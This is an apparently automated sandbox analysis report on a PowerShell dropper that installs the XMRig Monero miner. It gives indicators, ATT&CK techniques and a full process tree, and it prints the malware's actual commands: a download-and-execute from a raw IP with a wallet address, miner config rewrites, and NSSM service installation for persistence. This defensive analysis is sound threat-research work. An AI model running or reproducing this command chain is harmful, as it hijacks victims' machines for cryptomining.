xmrig | 8b2327fa7051814f975435494a19b02ecd4ace11ea8b63d6cb9bc9d924e6b44b

Analysis

max time kernel
1199s
max time network
1174s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
05/07/2024, 10:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trigger.ps1
Size

148B
MD5

24ad6c631c1a6215f9b8a06a9994088d
SHA1

c4a1221c00552e5d72c550e2d83aa5675d562092
SHA256

8b2327fa7051814f975435494a19b02ecd4ace11ea8b63d6cb9bc9d924e6b44b
SHA512

6026a86805a526a1a84b31bcee01ab60fa7eba7d98e56dec1b6ff8b0bd2ffe74ac24a7c2a3e33263faa3a38867a9147fcaaa45db1d0d945fe94a2006e95461d6

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac47-177.dat	family_xmrig
behavioral1/files/0x000700000001ac47-177.dat	xmrig
behavioral1/memory/4188-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-487-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-488-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-489-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-490-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-491-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-492-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-493-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-494-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-496-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-497-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-498-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-499-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-500-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-501-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-502-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-503-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-504-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-505-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-506-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-507-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-508-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-509-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-510-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-511-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-512-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-513-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-514-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-515-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-516-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-517-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-518-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-519-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-520-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-521-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-522-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-523-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4568-524-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	2452	powershell.exe
3	704	powershell.exe
5	1776	powershell.exe
10	4608	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4188	xmrig.exe
5112	nssm.exe
2452	nssm.exe
3700	nssm.exe
3060	nssm.exe
192	nssm.exe
1636	nssm.exe
316	nssm.exe
4568	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
10	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3484	sc.exe
3924	sc.exe
2292	sc.exe
4624	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
700	powershell.exe
3464	powershell.exe
4636	powershell.exe
1128	powershell.exe
4608	powershell.exe
704	powershell.exe
1776	powershell.exe
4328	powershell.exe
2452	powershell.exe
1140	powershell.exe
964	powershell.exe
4108	powershell.exe
3440	powershell.exe
4076	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4176	Process not Found
1780	timeout.exe
1968	timeout.exe
4436	timeout.exe
400	timeout.exe
5040	timeout.exe
4108	timeout.exe
4280	timeout.exe
1368	timeout.exe
3492	timeout.exe
2168	timeout.exe
4408	timeout.exe
2768	Process not Found
4100	Process not Found
4336	Process not Found
4464	Process not Found
708	timeout.exe
4044	Process not Found
4604	Process not Found
592	Process not Found
2376	Process not Found
5092	timeout.exe
1468	timeout.exe
4236	timeout.exe
3548	Process not Found
1048	timeout.exe
1684	Process not Found
5108	Process not Found
3812	timeout.exe
1000	timeout.exe
4928	timeout.exe
4964	Process not Found
4140	timeout.exe
2744	timeout.exe
764	timeout.exe
1788	Process not Found
1028	Process not Found
4872	timeout.exe
1208	Process not Found
4140	Process not Found
3232	timeout.exe
4372	Process not Found
2772	Process not Found
2664	timeout.exe
4440	timeout.exe
5084	Process not Found
3452	timeout.exe
4056	timeout.exe
3384	timeout.exe
3268	Process not Found
4688	timeout.exe
3092	timeout.exe
60	timeout.exe
940	timeout.exe
2904	Process not Found
2232	timeout.exe
2864	Process not Found
5084	Process not Found
1100	timeout.exe
2420	timeout.exe
3928	timeout.exe
5052	timeout.exe
3420	Process not Found
948	Process not Found

Kills process with taskkill 2 IoCs

evasion

pid	Process
4200	taskkill.exe
1924	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
3464	powershell.exe
3464	powershell.exe
3464	powershell.exe
964	powershell.exe
964	powershell.exe
964	powershell.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
1128	powershell.exe
1128	powershell.exe
1128	powershell.exe
4108	powershell.exe
4108	powershell.exe
4108	powershell.exe
3440	powershell.exe
3440	powershell.exe
3440	powershell.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
4076	powershell.exe
4076	powershell.exe
4076	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	964	powershell.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeLockMemoryPrivilege	4568	xmrig.exe
Token: SeIncreaseQuotaPrivilege	3504	WMIC.exe
Token: SeSecurityPrivilege	3504	WMIC.exe
Token: SeTakeOwnershipPrivilege	3504	WMIC.exe
Token: SeLoadDriverPrivilege	3504	WMIC.exe
Token: SeSystemProfilePrivilege	3504	WMIC.exe
Token: SeSystemtimePrivilege	3504	WMIC.exe
Token: SeProfSingleProcessPrivilege	3504	WMIC.exe
Token: SeIncBasePriorityPrivilege	3504	WMIC.exe
Token: SeCreatePagefilePrivilege	3504	WMIC.exe
Token: SeBackupPrivilege	3504	WMIC.exe
Token: SeRestorePrivilege	3504	WMIC.exe
Token: SeShutdownPrivilege	3504	WMIC.exe
Token: SeDebugPrivilege	3504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3504	WMIC.exe
Token: SeRemoteShutdownPrivilege	3504	WMIC.exe
Token: SeUndockPrivilege	3504	WMIC.exe
Token: SeManageVolumePrivilege	3504	WMIC.exe
Token: 33	3504	WMIC.exe
Token: 34	3504	WMIC.exe
Token: 35	3504	WMIC.exe
Token: 36	3504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3504	WMIC.exe
Token: SeSecurityPrivilege	3504	WMIC.exe
Token: SeTakeOwnershipPrivilege	3504	WMIC.exe
Token: SeLoadDriverPrivilege	3504	WMIC.exe
Token: SeSystemProfilePrivilege	3504	WMIC.exe
Token: SeSystemtimePrivilege	3504	WMIC.exe
Token: SeProfSingleProcessPrivilege	3504	WMIC.exe
Token: SeIncBasePriorityPrivilege	3504	WMIC.exe
Token: SeCreatePagefilePrivilege	3504	WMIC.exe
Token: SeBackupPrivilege	3504	WMIC.exe
Token: SeRestorePrivilege	3504	WMIC.exe
Token: SeShutdownPrivilege	3504	WMIC.exe
Token: SeDebugPrivilege	3504	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3504	WMIC.exe
Token: SeRemoteShutdownPrivilege	3504	WMIC.exe
Token: SeUndockPrivilege	3504	WMIC.exe
Token: SeManageVolumePrivilege	3504	WMIC.exe
Token: 33	3504	WMIC.exe
Token: 34	3504	WMIC.exe
Token: 35	3504	WMIC.exe
Token: 36	3504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4888	WMIC.exe
Token: SeSecurityPrivilege	4888	WMIC.exe
Token: SeTakeOwnershipPrivilege	4888	WMIC.exe
Token: SeLoadDriverPrivilege	4888	WMIC.exe
Token: SeSystemProfilePrivilege	4888	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4568	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 4424	2452	powershell.exe	75
PID 2452 wrote to memory of 4424	2452	powershell.exe	75
PID 4424 wrote to memory of 4200	4424	cmd.exe	77
PID 4424 wrote to memory of 4200	4424	cmd.exe	77
PID 4424 wrote to memory of 704	4424	cmd.exe	79
PID 4424 wrote to memory of 704	4424	cmd.exe	79
PID 704 wrote to memory of 1044	704	powershell.exe	80
PID 704 wrote to memory of 1044	704	powershell.exe	80
PID 1044 wrote to memory of 496	1044	cmd.exe	81
PID 1044 wrote to memory of 496	1044	cmd.exe	81
PID 496 wrote to memory of 3244	496	net.exe	82
PID 496 wrote to memory of 3244	496	net.exe	82
PID 1044 wrote to memory of 4292	1044	cmd.exe	83
PID 1044 wrote to memory of 4292	1044	cmd.exe	83
PID 1044 wrote to memory of 1784	1044	cmd.exe	84
PID 1044 wrote to memory of 1784	1044	cmd.exe	84
PID 1044 wrote to memory of 3716	1044	cmd.exe	85
PID 1044 wrote to memory of 3716	1044	cmd.exe	85
PID 1044 wrote to memory of 4712	1044	cmd.exe	86
PID 1044 wrote to memory of 4712	1044	cmd.exe	86
PID 1044 wrote to memory of 1428	1044	cmd.exe	87
PID 1044 wrote to memory of 1428	1044	cmd.exe	87
PID 1044 wrote to memory of 3924	1044	cmd.exe	88
PID 1044 wrote to memory of 3924	1044	cmd.exe	88
PID 1044 wrote to memory of 2292	1044	cmd.exe	89
PID 1044 wrote to memory of 2292	1044	cmd.exe	89
PID 1044 wrote to memory of 1924	1044	cmd.exe	90
PID 1044 wrote to memory of 1924	1044	cmd.exe	90
PID 1044 wrote to memory of 1776	1044	cmd.exe	91
PID 1044 wrote to memory of 1776	1044	cmd.exe	91
PID 1044 wrote to memory of 1140	1044	cmd.exe	92
PID 1044 wrote to memory of 1140	1044	cmd.exe	92
PID 1044 wrote to memory of 4328	1044	cmd.exe	93
PID 1044 wrote to memory of 4328	1044	cmd.exe	93
PID 1044 wrote to memory of 4188	1044	cmd.exe	94
PID 1044 wrote to memory of 4188	1044	cmd.exe	94
PID 1044 wrote to memory of 2768	1044	cmd.exe	95
PID 1044 wrote to memory of 2768	1044	cmd.exe	95
PID 2768 wrote to memory of 700	2768	cmd.exe	96
PID 2768 wrote to memory of 700	2768	cmd.exe	96
PID 700 wrote to memory of 424	700	powershell.exe	97
PID 700 wrote to memory of 424	700	powershell.exe	97
PID 1044 wrote to memory of 3464	1044	cmd.exe	98
PID 1044 wrote to memory of 3464	1044	cmd.exe	98
PID 1044 wrote to memory of 964	1044	cmd.exe	99
PID 1044 wrote to memory of 964	1044	cmd.exe	99
PID 1044 wrote to memory of 4636	1044	cmd.exe	100
PID 1044 wrote to memory of 4636	1044	cmd.exe	100
PID 1044 wrote to memory of 1128	1044	cmd.exe	101
PID 1044 wrote to memory of 1128	1044	cmd.exe	101
PID 1044 wrote to memory of 4108	1044	cmd.exe	102
PID 1044 wrote to memory of 4108	1044	cmd.exe	102
PID 1044 wrote to memory of 3440	1044	cmd.exe	103
PID 1044 wrote to memory of 3440	1044	cmd.exe	103
PID 1044 wrote to memory of 4608	1044	cmd.exe	104
PID 1044 wrote to memory of 4608	1044	cmd.exe	104
PID 1044 wrote to memory of 4076	1044	cmd.exe	105
PID 1044 wrote to memory of 4076	1044	cmd.exe	105
PID 1044 wrote to memory of 4624	1044	cmd.exe	106
PID 1044 wrote to memory of 4624	1044	cmd.exe	106
PID 1044 wrote to memory of 3484	1044	cmd.exe	107
PID 1044 wrote to memory of 3484	1044	cmd.exe	107
PID 1044 wrote to memory of 5112	1044	cmd.exe	108
PID 1044 wrote to memory of 5112	1044	cmd.exe	108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_0cbebcc2.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4424
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp70AC.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1044
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:496
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:3244
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:4292
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:1784
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:3716
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:4712
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:1428
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3924
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:2292
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1776
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4328
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:4188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2768
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:700
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:424
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ybqdfvlh\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1128
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4076
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:4624
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3484
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:5112
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:2452
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:3700
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:3060
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:192
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
